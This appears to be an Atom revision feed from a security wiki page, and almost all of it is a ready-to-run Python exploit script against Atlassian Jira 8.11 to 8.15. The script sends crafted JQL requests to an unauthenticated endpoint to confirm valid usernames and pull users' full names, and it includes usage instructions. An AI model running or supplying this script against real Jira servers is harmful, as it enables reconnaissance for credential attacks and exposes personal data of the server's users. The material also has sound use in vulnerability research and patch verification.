https://pwnwiki.com/index.php?action=history&feed=atom&title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E
Atlassian Jira 8.15.0 信息泄漏(用戶名枚舉)漏洞 - Revision history
2026-04-16T06:58:08Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Atlassian_Jira_8.15.0_%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%EF%BC%88%E7%94%A8%E6%88%B6%E5%90%8D%E6%9E%9A%E8%88%89%EF%BC%89%E6%BC%8F%E6%B4%9E&diff=3888&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage:..."
2021-06-02T01:14:02Z
<p>Created page with "==EXP== <pre> # Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage:..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)<br />
# Date: 31/05/2021<br />
# Exploit Author: Mohammed Aloraimi<br />
# Vendor Homepage: https://www.atlassian.com/<br />
# Software Link: https://www.atlassian.com/software/jira<br />
# Vulnerable versions: version 8.11.x to 8.15.0<br />
# Tested on: Kali Linux<br />
# Proof Of Concept:<br />
<br />
'''<br />
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.<br />
<br />
Tested versions:<br />
<br />
Atlassian JIRA 8.11.1<br />
Atlassian JIRA 8.13<br />
Atlassian JIRA 8.15<br />
'''<br />
<br />
#!/usr/bin/env python<br />
<br />
__author__ = "Mohammed Aloraimi (@ixSly)"<br />
<br />
<br />
<br />
import requests<br />
import sys<br />
import re<br />
import urllib3<br />
urllib3.disable_warnings()<br />
<br />
<br />
def help():<br />
print('python script.py <target> <username>')<br />
print('e.g. python script.py https://jiratarget.com admin')<br />
sys.exit()<br />
<br />
if len(sys.argv) < 3:<br />
help()<br />
<br />
<br />
<br />
def pwn(url,username):<br />
<br />
try:<br />
headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}<br />
data="jql=creator+in+({})&decorator=none".format(username)<br />
req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)<br />
if "issue.field.project" in req.text and req.status_code == 200:<br />
print("[+] {} is a Valid User".format(username))<br />
userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())<br />
if userFullName:<br />
print("[+] User FullName: " + userFullName.group(1))<br />
elif '["jqlTooComplex"]' in req.text and req.status_code == 401:<br />
print("[-] {} is not a Valid User".format(username))<br />
else:<br />
print("[-] Error..")<br />
except Exception as e:<br />
print(str(e))<br />
pass<br />
<br />
server = sys.argv[1]<br />
username = sys.argv[2]<br />
<br />
<br />
pwn(server,username)<br />
</pre></div>
Pwnwiki